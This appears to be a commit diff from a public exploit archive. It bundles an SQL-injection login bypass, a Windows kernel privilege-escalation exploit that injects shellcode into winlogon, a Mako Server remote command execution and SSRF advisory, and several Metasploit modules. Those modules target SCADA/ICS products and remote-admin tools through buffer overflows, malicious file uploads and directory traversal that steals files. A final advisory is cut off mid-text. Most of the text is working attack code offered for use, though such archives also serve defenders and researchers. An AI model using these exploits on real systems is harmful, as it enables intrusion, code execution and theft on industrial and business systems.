# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
# Description:
# The vulnerability allows an attacker to inject sql commands....
#
# Proof of Concept:
#
# http://localhost/[PATH]/index.php?page=news&nid=[SQL]
#
# http://localhost/[PATH]/admin
#
# User: 'or 1=1 or ''=' Pass: anything
#
# Etc..
# # # # #

View file

@ -34,7 +34,9 @@ Timeline:
Exploitation:
=============
This exploit uses a data only attack via the Quota Process Pointer Overwrite technique. We smash the token and dec a controlled address by 0x50 (size of the Mutant) to enable SeDebugPrivilege's. Then we inject code into a system process.
This exploit uses a data only attack via the Quota Process Pointer Overwrite technique. We smash the token's _SEP_TOKEN_PRIVILEGES->Enabled and dec the controlled address by 0x50 (size of the Mutant) to enable SeDebugPrivilege's. Then we inject code into a system process.
Note that this exploit doesn't use any kernel mode shellcode :->
References:
===========
@ -222,11 +224,10 @@ def alloc_pool_overflow_buffer(base, input_size):
print "(+) allocating pool overflow input buffer"
baseadd = c_int(base)
size = c_int(input_size)
priv = token + 0x40 + 0x8 # Enabled
input = struct.pack("<I", 0x0000001a) # size
input += "\x44" * 0x398 # offset to overflown chunks
priv = token + 0x40 + 0x8 # Enabled
# patch
input += struct.pack("<I", 0x040a008c) # _POOL_HEADER
@ -235,13 +236,13 @@ def alloc_pool_overflow_buffer(base, input_size):
input += struct.pack("<I", 0x00000000)
input += struct.pack("<I", 0x00000001)
input += "\x44" * 0x20
input += struct.pack("<I", 0x00000001)
input += struct.pack("<I", 0x00000001) # set @ecx to 0x1, to write another 0x4 dwords
input += struct.pack("<I", 0x00000000)
input += "\x44" * 8
input += struct.pack("<I", 0x00000001)
input += struct.pack("<I", 0x00000001)
input += "\x44" * 4
input += struct.pack("<I", 0x0008000e)
input += struct.pack("<I", 0x0008000e) # restore the TypeIndex ;-)
input += struct.pack("<I", priv) # Quota Process Pointer Overwrite
# filler
@ -354,33 +355,41 @@ def we_can_leak_token():
def trigger_lpe():
"""
This function frees the IoCompletionReserve objects and this triggers the
registered aexit, which is our controlled pointer to OkayToCloseProcedure.
This function frees the Mutant objects and this triggers the
usage of the Quota Process Pointer, dec'ing by 0x50, avoiding OkayToCloseProcedure.
"""
# free the corrupted chunk to trigger OkayToCloseProcedure
# we dont know where the free chunk is, we just know its in one of the pages
# full of Mutants and that its the 2nd chunk after the overflowed buffer.
# full of Mutants and that its the 2nd chunk after the overflowed buffer. Good enough.
for v in to_free:
kernel32.CloseHandle(v)
def get_winlogin_pid():
"""
Just gets winlogon pid. Get whateva system pid you want
"""
for proc in psutil.process_iter():
# choose whateva system process
if proc.name() == "winlogon.exe":
return proc.pid
return 0
def we_can_inject():
"""
Now that we have the SeDebugPrivilege, we can inject into a system process.
I choose winlogon because you get the bonus GUI.
"""
page_rwx_value = 0x40
process_all = 0x1F0FFF
memcommit = 0x00001000
process_handle = windll.kernel32.OpenProcess(process_all, False, get_winlogin_pid()) # WinLogin
if process_handle == 0:
return False
print "(+) got a handle to winlogon! 0x%x" % process_handle
process_all = 0x1f0fff
memcommit = 0x00001000
hThread = HANDLE()
# metasploit EXITFUNC=Thread
# get a handle to the process
pHandle = windll.kernel32.OpenProcess(process_all, False, get_winlogin_pid())
if pHandle == 0:
return False
print "(+) got a handle to winlogon! 0x%x" % pHandle
# metasploit windows/exec CMD=cmd.exe EXITFUNC=Thread
buf = ""
buf += "\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b"
buf += "\x50\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7"
@ -398,13 +407,16 @@ def we_can_inject():
buf += "\x80\xfb\xe0\x75\x05\xbb\x47\x13\x72\x6f\x6a\x00\x53"
buf += "\xff\xd5\x63\x6d\x64\x2e\x65\x78\x65\x00"
shellcode_length = len(buf)
hThread = HANDLE()
memory_allocation_variable = windll.kernel32.VirtualAllocEx(process_handle, 0, shellcode_length, memcommit, page_rwx_value)
print "(+) allocated shellcode in winlogon @ 0x%x" % memory_allocation_variable
res = windll.kernel32.WriteProcessMemory(process_handle, memory_allocation_variable, buf, shellcode_length, 0)
# allocate some memory in the process
fPointer = windll.kernel32.VirtualAllocEx(pHandle, 0, len(buf), memcommit, page_rwx_value)
print "(+) allocated shellcode in winlogon @ 0x%x" % fPointer
# write the shellcode to the memory
res = windll.kernel32.WriteProcessMemory(pHandle, fPointer, buf, len(buf), 0)
print "(+) WriteProcessMemory returned: 0x%x" % res
res = windll.ntdll.RtlCreateUserThread(process_handle, None, 0, 0, 0, 0, memory_allocation_variable, 0, byref(hThread), 0)
# create a new thread that starts execution at that code location
res = windll.ntdll.RtlCreateUserThread(pHandle, None, 0, 0, 0, 0, fPointer, 0, byref(hThread), 0)
print "(+) RtlCreateUserThread returned: 0x%x" % res
return True

View file

@ -0,0 +1,161 @@
[+] SSD Beyond Security: https://blogs.securiteam.com/index.php/archives/3391
[+] Credits: John Page a.k.a hyp3rlinx
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/MAKO-WEB-SERVER-MULTIPLE-UNAUTHENTICATED-VULNERABILIITIES-SECURITEAM.txt
[+] ISR: ApparitionSec
Vulnerabilities Summary
The following advisory describe three (3) vulnerabilities found in Mako Servers tutorial page.
The vulnerabilities found are:
Unauthenticated Arbitrary File Write vulnerability that leads to Remote Command Execution
Unauthenticated File Disclosure
Unauthenticated Server Side Request Forgery
As these tutorial may be used as the basis for production code, it is important for users to be aware of these issues.
“As a compact application and web server, the Mako Server helps developers rapidly design secure IoT and web applications. The Mako Server provides
an application server environment from which developers can design and implement complete, custom solutions. The Mako Web Server is ideal for embedded Linux systems.”
Credit
An independent security researcher, John Page AKA hyp3rlinx, has reported this vulnerability to Beyond Securitys SecuriTeam Secure Disclosure program
Vendor response
RealTimeLogic was informed of the vulnerability on Aug 13, but while acknowledging the receipt of the vulnerability information, refused to respond to the
technical claims, to give a fix timeline or coordinate an advisory, saying:
“I just sent a formal notification for the commercial license requirement and also we need to put a maintenance contract in place.
Internally I need to set-up a cost allocation account for billing against these support inquiries.”
At this time its unclear whether these vulnerabilities are going to be fixed and further attempts to get a status clarification failed.
Vulnerabilities details
Unauthenticated Arbitrary File Write vulnerability that leads to Remote Command Execution:
Mako web-server tutorial does not sufficiently sanitizing the HTTP PUT requests, when an attacker send HTTP PUT request to save.lsp web page, the input passed
to a function responsible for accessing the filesystem.
The attacker input will be saved on the victims machine and can be execute by sending HTTP GET request to manage.lsp
HTTP PUT 'http://VICTIM-IP/examples/save.lsp?ex=2.1'
HTTP GET 'http://VICTIM-IP/examples/manage.lsp?execute=true&ex=2.1&type=lua'
Proof of Concept
import urllib2,time
#MakoServer v2.5 Remote Command Execution 0day
#Credits: John Page AKA hyp3rlinx
#=========================================
print 'MakoServer v2.5 Remote Command Execution'
CMD="os.execute('c:/Windows/system32/calc.exe')"
opener = urllib2.build_opener(urllib2.HTTPHandler)
request = urllib2.Request('http://IP/examples/save.lsp?ex=2.1', data=CMD)
request.add_header('Content-Type', 'text/plain;charset=UTF-8')
request.add_header('X-Requested-With', 'XMLHttpRequest')
request.add_header('Referer', 'http://localhost/Lua-Types.lsp')
request.get_method = lambda: 'PUT'
opener.open(request)
time.sleep(1)
urllib2.urlopen('http://IP/examples/manage.lsp?execute=true&ex=2.1&type=lua')
Unauthenticated File Disclosure
Mako web-server tutorial is not sufficiently sanitizing GET requests, when an attacker send GET request to the URI IP/fs/../.., the input passed
without modification and the response with the file content is returned.
Proof of Concept
The following GET request will response with the C/Windows/system.ini content:
curl -v http://VICTIM-IP/fs/C/Windows/system.ini
* About to connect() to VICTIM-IP port 80
* Trying VICTIM-IP... connected
* Connected to VICTIM-IP (VICTIM-IP) port 80
> GET /fs/C/Windows/system.ini HTTP/1.1
> User-Agent: curl/7.15.5 (x86_64-redhat-linux-gnu) libcurl/7.15.5 OpenSSL/0.9.8b zlib/1.2.3 libidn/0.6.5
> Host: VICTIM-IP
> Accept: */*
>
< HTTP/1.1 200 OK
< Date: Mon, 07 Aug 2017 22:21:27 GMT
< Server: MakoServer.net
< Content-Type: application/octet-stream
< Accept-Ranges: bytes
< Etag: 58b4be20
< Last-Modified: Tue, 28 Feb 2017 00:02:40 GMT
< Content-Length: 219
< Keep-Alive: Keep-Alive
; for 16-bit app support
[386Enh]
woafont=dosapp.fon
EGA80WOA.FON=EGA80WOA.FON
EGA40WOA.FON=EGA40WOA.FON
CGA80WOA.FON=CGA80WOA.FON
CGA40WOA.FON=CGA40WOA.FON
[drivers]
wave=mmdrv.dll
timer=timer.drv
[mci]
Server Side Request Forgery
Mako web-server tutorial is not sufficiently sanitizing incoming POST requests, when an attacker sends an POST request to the rtl/appmgr/new-application.lsp
URI, the input will be executed and the server will connect to the attackers machine.
Proof of Concept
Start Wireshark to see successful connections made from Mako Web Server victim machine.
Initiate requests from another machine using CURL:
curl -v -X POST http://VICTIM-IP/rtl/appmgr/new-application.lsp -d io=net -d path=http://EXTERNAL-IP
Network Access:
===============
Remote
Severity:
=========
High
Disclosure Timeline:
====================
Would like to acknowledge Beyond Securitys SSD program for the help with co-ordination of this vulnerability.
More details can be found on their blog at:
https://blogs.securiteam.com/index.php/archives/3391
[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
or exploits by the author or elsewhere. All content (c).
hyp3rlinx

View file

@ -0,0 +1,68 @@
require 'msf/core'
class MetasploitModule < Msf::Exploit::Remote
Rank = GreatRanking
include Msf::Exploit::Remote::TcpServer
def initialize(info = {})
super(update_info(info,
'Name' => 'ZScada Net Buffer Overflow',
'Description' => %q{
This module exploits a stack based buffer overflow found in
Z-Scada Net 2.0. The vulnerability is triggered when parsing
the response to a Modbus packet.
},
'Author' => [ 'james fitts' ],
'License' => MSF_LICENSE,
'References' =>
[
[ 'url', 'https://lists.immunityinc.com/pipermail/canvas/2014-December/000141.html' ],
],
'Privileged' => false,
'DefaultOptions' =>
{
'EXITFUNC' => 'process',
},
'Payload' =>
{
'Space' => 500,
'BadChars' => "",
'StackAdjustment' => -3500
},
'Platform' => 'win',
'Targets' =>
[
[
'Windows XP SP3 EN',
{
# zscadanet.exe v1.0
# pop ecx/ pop ebp/ retn
'Ret' => 0x00429c35
}
],
],
'DefaultTarget' => 0,
'DisclosureDate' => 'Dec 11 2014'))
register_options(
[
OptPort.new('SRVPORT', [ true, "The port to listen on", 502])
], self.class)
end
def on_client_data(client)
p = payload.encoded
buf = pattern_create(5000)
buf[574, 4] = [0x909006eb].pack('V') # jmp $+8
buf[578, 4] = [target.ret].pack('V')
buf[582, 24] = "\x41" * 24
buf[606, p.length] = p
client.put(buf)
handler
service.close_client(client)
end
end

View file

@ -0,0 +1,73 @@
require 'msf/core'
class MetasploitModule < Msf::Exploit::Remote
Rank = GreatRanking
include Msf::Exploit::Remote::TcpServer
def initialize(info = {})
super(update_info(info,
'Name' => 'VIPA Authomation WinPLC7 recv Stack Buffer Overflow',
'Description' => %q{
This module exploits a stack based buffer overflow found in VIPA
Automation WinPLC7 <= 5.0.45.5921. The overflow is triggered when
WinPLC7 connects to a remote server and accepts a malicious packet.
The first 2 bytes of this packet are read in and used as the size
value for a later recv function. If a size value of sufficiently
large size is supplied a stack buffer overflow will occur
},
'Author' => [ 'james fitts' ],
'License' => MSF_LICENSE,
'References' =>
[
[ 'ZDI', '17-112' ],
[ 'CVE', '2017-5177' ],
[ 'URL', 'https://ics-cert.us-cert.gov/advisories/ICSA-17-054-01' ]
],
'Privileged' => false,
'DefaultOptions' =>
{
'EXITFUNC' => 'process',
},
'Payload' =>
{
'Space' => 500,
'BadChars' => "",
'StackAdjustment' => -3500
},
'Platform' => 'win',
'Targets' =>
[
[
'Windows 7 EN',
{
# ws7v5.exe
# jmp esp
'Ret' => 0x00422354
}
],
],
'DefaultTarget' => 0,
'DisclosureDate' => 'Feb 28 2017'))
register_options(
[
OptPort.new('SRVPORT', [ true, "The port to listen on", 7777])
], self.class)
end
def on_client_data(client)
p = payload.encoded
pkt = "\x13\x88\x00\x00\x00" # len
pkt += Rex::Text.pattern_create(5000)
pkt[848, 4] = [target.ret].pack('V')
pkt[852, p.length] = p
client.put(pkt)
handler
service.close_client(client)
end
end

100
platforms/windows/remote/42694.rb Executable file
View file

@ -0,0 +1,100 @@
require 'msf/core'
class MetasploitModule < Msf::Exploit::Remote
Rank = GreatRanking
include Msf::Exploit::Remote::Tcp
def initialize(info = {})
super(update_info(info,
'Name' => 'Sielco Sistemi Winlog <= 2.07.16',
'Description' => %q{
This module exploits a stack based buffer overflow
found in Sielco Sistemi Winlog <= 2.07.16. The
overflow is triggered during the parsing of a
maliciously crafted packet
},
'Author' => [ 'James Fitts' ],
'License' => MSF_LICENSE,
'Version' => '$Revision: $',
'References' =>
[
],
'Privileged' => true,
'DefaultOptions' =>
{
'EXITFUNC' => 'thread',
},
'Payload' =>
{
'Space' => 150,
'BadChars' => "\x00\x0a\x0d\x20",
'DisableNops' => 'True',
# add esp, -5500
'PrependEncoder' => "\x81\xc4\x84\xea\xff\xff",
'Compat' =>
{
'SymbolLookup' => 'ws2ord',
}
},
'Platform' => 'win',
'Targets' =>
[
[
'Windows XP SP3 EN (Automatic Washing System Demo)',
{
# vcldb40.bpl
# jmp esp
'Ret' => 0x46035f8b,
'Offset' => 160,
'jmp' => "\xe9\x56\xff\xff\xff",
}
],
[
'Windows XP SP3 EN (Car Simulation)',
{
# vcl40.bpl
# jmp esp
'Ret' => 0x4003eb6b,
'Offset' => 175,
'jmp' => "\xe9\x46\xff\xff\xff",
}
],
[
'Windows XP SP3 EN (Ceramics Kiln)',
{
# ter19.dll
# push esp/ retn
'Ret' => 0x258b4432,
'Offset' => 176,
'jmp' => "\xe9\x46\xff\xff\xff",
}
],
],
'DefaultTarget' => 0,
'DisclosureDate' => 'Jun 26 2012'))
register_options([Opt::RPORT(46824)], self.class)
end
def exploit
connect
boom = rand_text_alpha_upper(20)
boom << 'x'
boom << rand_text_alpha_upper(target['Offset'])
boom << [target.ret].pack('V')
boom << "\x41" * 4
boom << target['jmp']
boom << "\xcc" * (281 - boom.length)
boom[22,4] = "\x41" * 4
boom[26,payload.encoded.length] = payload.encoded
print_status("Trying target #{target.name}...")
sock.put(boom)
handler
end
end

View file

@ -0,0 +1,84 @@
require 'msf/core'
class MetasploitModule < Msf::Exploit::Remote
Rank = GreatRanking
include Msf::Exploit::Remote::Tcp
def initialize(info = {})
super(update_info(info,
'Name' => 'Motorola Netopia Netoctopus SDCS Stack Buffer Overflow',
'Description' => %q{
This module exploits a vulnerability within the code responsible for
parsing client requests. When reading in a request from the network,
a 32-bit integer is read in that specifies the number of bytes that
follow. This value is not validated, and is then used to read data into
a fixed-size stack buffer.
},
'Author' => [ 'James Fitts' ],
'License' => MSF_LICENSE,
'Version' => '$Revision: $',
'References' =>
[
[ 'URL', 'http://www.verisigninc.com/en_US/products-and-services/network-intelligence-availability/idefense/public-vulnerability-reports/articles/index.xhtml?id=851' ]
],
'DefaultOptions' =>
{
'EXITFUNC' => 'thread',
},
'Privileged' => true,
'Payload' =>
{
'Space' => 500,
'DisableNops' => 'true',
'BadChars' => "",
'PrependEncoder' => "\x81\xc4\x54\xf2\xff\xff"
},
'Platform' => 'win',
'Targets' =>
[
[
'Windows XP SP3 EN',
{
# pop ecx/ pop ecx/ retn
# msvcrt.dll
'Ret' => 0x0044e046,
}
],
],
'DefaultTarget' => 0,
'DisclosureDate' => 'Jul 14 2008'))
register_options(
[
Opt::RPORT(3814)
], self.class )
end
def exploit
connect
p = payload.encoded
pkt = "\x41" * 600
pkt[0, 4] = [0x01000000].pack('V')
pkt[8, 4] = [0x01000000].pack('V')
pkt[12, 4] = [0x01000000].pack('V')
pkt[16, 4] = [0x03000000].pack('V') # this is the value mentioned above
pkt[20, 4] = [0x66000000].pack('V')
pkt[30, p.length] = p
pkt[545, 4] = "\xeb\x06\x90\x90"
pkt[549, 4] = [target.ret].pack('V')
pkt[558, 6] = "\x81\xc4\x34\x06\x00\x00" # add esp, 1588
pkt[564, 2] = "\xff\xe4" # jmp esp
print_status("Trying target %s..." % target.name)
sock.put(pkt)
handler
disconnect
end
end

View file

@ -0,0 +1,71 @@
require 'msf/core'
class MetasploitModule < Msf::Exploit::Remote
Rank = GreatRanking
include Msf::Exploit::Remote::TcpServer
def initialize(info = {})
super(update_info(info,
'Name' => 'Fatek Automation PLC WinProladder Stack-based Buffer Overflow',
'Description' => %q{
This module exploits a stack based buffer overflow found in Fatek Automation
PLC WinProladder v3.11 Build 14701. The vulnerability is triggered when a client
connects to a listening server. The client does not properly sanitize the length
of the received input prior to placing it on the stack.
},
'Author' => [ 'james fitts' ],
'License' => MSF_LICENSE,
'References' =>
[
[ 'ZDI', '16-672' ],
[ 'CVE', '2016-8377' ],
[ 'URL', 'https://ics-cert.us-cert.gov/advisories/ICSA-16-350-01' ]
],
'Privileged' => false,
'DefaultOptions' =>
{
'EXITFUNC' => 'process',
},
'Payload' =>
{
'Space' => 1000,
'BadChars' => "\x00\x0a\x0d\x20",
'StackAdjustment' => -3500
},
'Platform' => 'win',
'Targets' =>
[
[
'Windows 7 EN',
{
# CC3250MT.dll
# pop ecx/ pop ebp/ retn
'Ret' => 0x32514d79
}
],
],
'DefaultTarget' => 0,
'DisclosureDate' => 'Dec 15 2016'))
register_options(
[
OptPort.new('SRVPORT', [ true, "The port to listen on", 500])
], self.class)
end
def on_client_data(client)
p = payload.encoded
pkt = "A" * 10000
pkt[1092, 4] = [0x04eb9090].pack('V') # jmp $+6
pkt[1096, 4] = [target.ret].pack('V')
pkt[1100, 50] = "\x90" * 50
pkt[1150, p.length] = p
client.put(pkt)
handler
service.close_client(client)
end
end

112
platforms/windows/remote/42703.rb Executable file
View file

@ -0,0 +1,112 @@
require 'msf/core'
class MetasploitModule < Msf::Exploit::Remote
Rank = GreatRanking
include Msf::Exploit::Remote::Tcp
def initialize(info = {})
super(update_info(info,
'Name' => 'Dameware Mini Remote Control Username Stack Buffer Overflow',
'Description' => %q{
This module exploits a stack based buffer overflow vulnerability found
in Dameware Mini Remote Control v4.0. The overflow is caused when sending
an overly long username to the DWRCS executable listening on port 6129.
The username is read into a strcpy() function causing an overwrite of
the return pointer leading to arbitrary code execution.
},
'Author' => [ 'James Fitts' ],
'License' => MSF_LICENSE,
'Version' => '$Revision: $',
'References' =>
[
[ 'CVE', '2005-2842' ],
[ 'BID', '14707' ],
[ 'URL', 'http://secunia.com/advisories/16655' ],
[ 'URL', 'http://archives.neohapsis.com/archives/fulldisclosure/2005-08/1074.html' ]
],
'DefaultOptions' =>
{
'EXITFUNC' => 'thread',
},
'Privileged' => true,
'Payload' =>
{
'Space' => 140,
'BadChars' => "\x00\x0a\x0d",
'StackAdjustment' => -3500,
'PrependEncoder' => "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff",
'Compat' =>
{
'SymbolLookup' => '+ws2ord',
},
},
'Platform' => 'win',
'Targets' =>
[
[
'Windows XP SP3 EN',
{
# msvcrt.dll
# push esp/ retn
'Ret' => 0x77c35459,
}
],
],
'DefaultTarget' => 0,
'DisclosureDate' => 'Sept 01 2005'))
register_options(
[
Opt::RPORT(6129),
], self.class )
end
def pkt1
p = payload.encoded
boom = "\x43" * 259
boom[100, 4] = [target.ret].pack('V')
boom[108, p.length] = p
packet = "\x00" * 4056
packet[0, 4] = "\x30\x11\x00\x00"
packet[4, 4] = "\x00\x00\x00\x00"
packet[8, 4] = "\xd7\xa3\x70\x3d"
packet[12, 4] = "\x0a\xd7\x0d\x40"
packet[16, 20] = "\x00" * 20
packet[36, 4] = "\x01\x00\x00\x00"
packet[40, 4] = [0x00002710].pack('V')
packet[196, 259] = rand_text_alpha(259)
packet[456, 259] = boom
packet[716, 259] = rand_text_alpha(259)
packet[976, 259] = rand_text_alpha(259)
packet[1236, 259] = rand_text_alpha(259)
packet[1496, 259] = rand_text_alpha(259)
return packet
end
def pkt2
packet = "\x00" * 4096
packet[756, 259] = rand_text_alpha(259)
return packet
end
def exploit
connect
sock.put(pkt1)
sock.recv(1024)
sock.put(pkt2)
sock.recv(84)
handler
disconnect
end
end
__END__

127
platforms/windows/remote/42704.rb Executable file
View file

@ -0,0 +1,127 @@
require 'msf/core'
class MetasploitModule < Msf::Exploit::Remote
Rank = GreatRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::EXE
include Msf::Exploit::WbemExec
def initialize(info = {})
super(update_info(info,
'Name' => 'Cloudview NMS File Upload',
'Description' => %q{
This module exploits a file upload vulnerability
found within Cloudview NMS < 2.00b. The vulnerability
is triggered by sending specialized packets to the
server with directory traversal sequences (..@ in
this case) to browse outside of the web root.
},
'Author' => [ 'james fitts' ],
'License' => MSF_LICENSE,
'References' =>
[
[ 'URL', '0day' ]
],
'DefaultOptions' =>
{
'EXITFUNC' => 'thread',
},
'Privileged' => true,
'Payload' =>
{
'BadChars' => "\x00",
},
'Platform' => 'win',
'Targets' =>
[
[ 'Cloudview NMS 2.00b on Windows', {} ],
],
'DefaultTarget' => 0,
'DisclosureDate' => 'Oct 13 2014'))
register_options([
Opt::RPORT(80),
OptString.new('USERNAME', [ true, "The username to log in with", "Admin" ]),
OptString.new('PASSWORD', [ false, "The password to log in with", "" ])
], self.class )
end
def exploit
# setup
vbs_name = rand_text_alpha(rand(10)+5) + '.vbs'
exe = generate_payload_exe
vbs_content = Msf::Util::EXE.to_exe_vbs(exe)
mof_name = rand_text_alpha(rand(10)+5) + '.vbs'
mof = generate_mof(mof_name, vbs_name)
peer = "#{datastore['RHOST']}:#{datastore['RPORT']}"
print_status("Uploading #{vbs_name} to #{peer}...")
# logging in to get the "session"
@sess = rand(0..2048)
res = send_request_cgi({
'method' => 'POST',
'uri' => "/MPR=#{@sess}:/",
'version' => '1.1',
'ctype' => 'application/x-www-form-urlencoded',
'data' => "username=#{datastore['USERNAME']}&password=#{datastore['PASSWORD']}&mybutton=Login%21&donotusejava=html"
})
# This is needed to setup the upload directory
res = send_request_cgi({
'method' => 'GET',
'uri' => "/MPR=#{@sess}:/descriptor!ChangeDir=C:@..@..@..@WINDOWS@system32@!-!-!@extdir%5Cfilelistpage!-!1000",
'version' => '1.1',
})
# Uploading VBS file
data = Rex::MIME::Message.new
data.add_part("#{vbs_content}", "application/octet-stream", nil, "form-data; name=\"upfile\"; filename=\"#{vbs_name}\"")
post_data = data.to_s.gsub(/^\r\n\-\-\_Part\_/, "--_Part_")
res = send_request_cgi({
'method' => 'POST',
'uri' => "/MPR=#{@sess}:/",
'version' => '1.1',
'ctype' => "multipart/form-data; boundary=#{data.bound}",
'data' => post_data
})
if res.body =~ /Uploaded file OK/
print_good("Uploaded #{vbs_name} successfully!")
print_status("Uploading #{mof_name} to #{peer}...")
# Setting up upload directory
res = send_request_cgi({
'method' => 'GET',
'uri' => "/MPR=#{@sess}:/descriptor!ChangeDir=C:@..@..@..@WINDOWS@system32@wbem@mof@!-!-!@extdir%5Cfilelistpage!-!1000",
'version' => '1.1'
})
# Uploading MOF file
data = Rex::MIME::Message.new
data.add_part("#{mof}", "application/octet-stream", nil, "form-data; name=\"upfile\"; filename=\"#{mof_name}\"")
post_data = data.to_s.gsub(/^\r\n\-\-\_Part\_/, "--_Part_")
res = send_request_cgi({
'method' => 'POST',
'uri' => "/MPR=#{@sess}:/",
'version' => '1.1',
'ctype' => "multipart/form-data; boundary=#{data.bound}",
'data' => post_data
})
if res.body =~ /Uploaded file OK/
print_good("Uploaded #{mof_name} successfully!")
else
print_error("Something went wrong...")
end
else
print_error("Something went wrong...")
end
end
end

View file

@ -0,0 +1,17 @@
Source: https://github.com/Voulnet/CVE-2017-8759-Exploit-sample
Running CVE-2017-8759 exploit sample.
Flow of the exploit:
Word macro runs in the Doc1.doc file. The macro downloads a badly formatted txt file over wsdl, which triggers the WSDL parser log. Then the parsing log results in running mshta.exe which in turn runs a powershell commands that runs mspaint.exe
To test:
Run a webserver on port 8080, and put the files exploit.txt and cmd.hta on its root. For example python -m SimpleHTTPServer 8080
If all is good mspaint should run.
Proof of Concept:
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/42711.zip

View file

@ -0,0 +1,59 @@
require 'msf/core'
class MetasploitModule < Msf::Auxiliary
Rank = GreatRanking
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
'Name' => 'Indusoft Web Studio Directory Traversal',
'Description' => %q{
This module exploits a flaw found in Indusoft Web Studio
<= 7.1 before SP2 Patch 4. This specific flaw allows users
to browse outside of the webroot to download files found
on the underlying system
},
'Author' => [ 'James Fitts' ],
'License' => MSF_LICENSE,
'Version' => '$Revision: $',
'References' =>
[
[ 'CVE', '2014-0780' ],
[ 'ZDI', '14-118/' ],
[ 'URL', 'http://ics-cert.us-cert.gov/advisories/ICSA-14-107-02']
],
'DisclosureDate' => 'Jan 18 2013'))
register_options(
[
OptInt.new('DEPTH', [ false, 'Levels to reach base directory', 8]),
OptString.new('FILE', [ false, 'This is the file to download', 'boot.ini']),
Opt::RPORT(80)
], self.class )
end
def run
depth = (datastore['DEPTH'].nil? or datastore['DEPTH'] == 0) ? 10 : datastore['DEPTH']
levels = "/" + ("../" * depth)
res = send_request_raw({
'method' => 'GET',
'uri' => "/" + levels + datastore['FILE'],
})
if res and res.code == 200 and res.message =~ /Sending file/
loot = res.body
if not loot or loot.empty?
print_status("File from #{rhost}:#{rport} is empty...")
return
end
file = ::File.basename(datastore['FILE'])
path = store_loot('indusoft.webstudio.file', 'application/octet-stream', rhost, loot, file, datastore['FILE'])
print_status("Stored #{datastore['FILE']} to #{path}")
return
end
end
end

View file

@ -0,0 +1,67 @@
require 'msf/core'
class MetasploitModule < Msf::Auxiliary
Rank = GreatRanking
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
'Name' => 'Carlo Gavazzi Powersoft Directory Traversal',
'Description' => %q{
This module exploits a directory traversal vulnerability
found in Carlo Gavazzi Powersoft <= 2.1.1.1. The vulnerability
is triggered when sending a specially crafted GET request to the
server. The location parameter of the GET request is not sanitized
and the sendCommand.php script will automatically pull down any
file requested
},
'Author' => [ 'james fitts' ],
'License' => MSF_LICENSE,
'References' =>
[
[ 'URL', 'http://gleg.net/agora_scada_upd.shtml']
],
'DisclosureDate' => 'Jan 21 2015'))
register_options(
[
OptInt.new('DEPTH', [ false, 'Levels to reach base directory', 8]),
OptString.new('FILE', [ false, 'This is the file to download', 'boot.ini']),
OptString.new('USERNAME', [ true, 'Username to authenticate with', 'admin']),
OptString.new('PASSWORD', [ true, 'Password to authenticate with', 'admin']),
Opt::RPORT(80)
], self.class )
end
def run
require 'base64'
credentials = Base64.encode64("#{datastore['USERNAME']}:#{datastore['PASSWORD']}")
depth = (datastore['DEPTH'].nil? or datastore['DEPTH'] == 0) ? 10 : datastore['DEPTH']
levels = "/" + ("../" * depth)
res = send_request_raw({
'method' => 'GET',
'uri' => "#{levels}#{datastore['FILE']}?res=&valid=true",
'headers' => {
'Authorization' => "Basic #{credentials}"
},
})
if res and res.code == 200
loot = res.body
if not loot or loot.empty?
print_status("File from #{rhost}:#{rport} is empty...")
return
end
file = ::File.basename(datastore['FILE'])
path = store_loot('carlo.gavazzi.powersoft.file', 'application/octet-stream', rhost, loot, file, datastore['FILE'])
print_status("Stored #{datastore['FILE']} to #{path}")
return
end
end
end

View file

@ -0,0 +1,57 @@
require 'msf/core'
class MetasploitModule < Msf::Auxiliary
Rank = GreatRanking
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
'Name' => 'Carel Pl@ntVisor Directory Traversal',
'Description' => %q{
This module exploits a directory traversal vulnerability
found in Carel Pl@ntVisor <= 2.4.4. The vulnerability is
triggered by sending a specially crafted GET request to the
victim server.
},
'Author' => [ 'james fitts' ],
'License' => MSF_LICENSE,
'References' =>
[
[ 'CVE', '2011-3487' ],
[ 'BID', '49601' ],
],
'DisclosureDate' => 'Jun 29 2012'))
register_options(
[
OptInt.new('DEPTH', [ false, 'Levels to reach base directory', 10]),
OptString.new('FILE', [ false, 'This is the file to download', 'boot.ini']),
Opt::RPORT(80)
], self.class )
end
def run
depth = (datastore['DEPTH'].nil? or datastore['DEPTH'] == 0) ? 10 : datastore['DEPTH']
levels = "/" + ("..%5c" * depth)
res = send_request_raw({
'method' => 'GET',
'uri' => "#{levels}#{datastore['FILE']}",
})
if res and res.code == 200
loot = res.body
if not loot or loot.empty?
print_status("File from #{rhost}:#{rport} is empty...")
return
end
file = ::File.basename(datastore['FILE'])
path = store_loot('plantvisor.file', 'application/octet-stream', rhost, loot, file, datastore['FILE'])
print_status("Stored #{datastore['FILE']} to #{path}")
return
end
end
end

View file

@ -0,0 +1,76 @@
#######################################################################
Luigi Auriemma
Application: Carel PlantVisor
http://www.carel.com/carelcom/web/eng/catalogo/prodotto_dett.jsp?id_prodotto=310
Versions: <= 2.4.4
Platforms: Windows
Bug: directory traversal
Exploitation: remote
Date: 13 Sep 2011
Author: Luigi Auriemma
e-mail: aluigi@autistici.org
web: aluigi.org
#######################################################################
1) Introduction
2) Bug
3) The Code
4) Fix
#######################################################################
===============
1) Introduction
===============
From vendor's homepage:
"PlantVisor Enhanced is monitoring and telemaintenance software for
refrigeration and air-conditioning systems controlled by CAREL
instruments."
#######################################################################
======
2) Bug
======
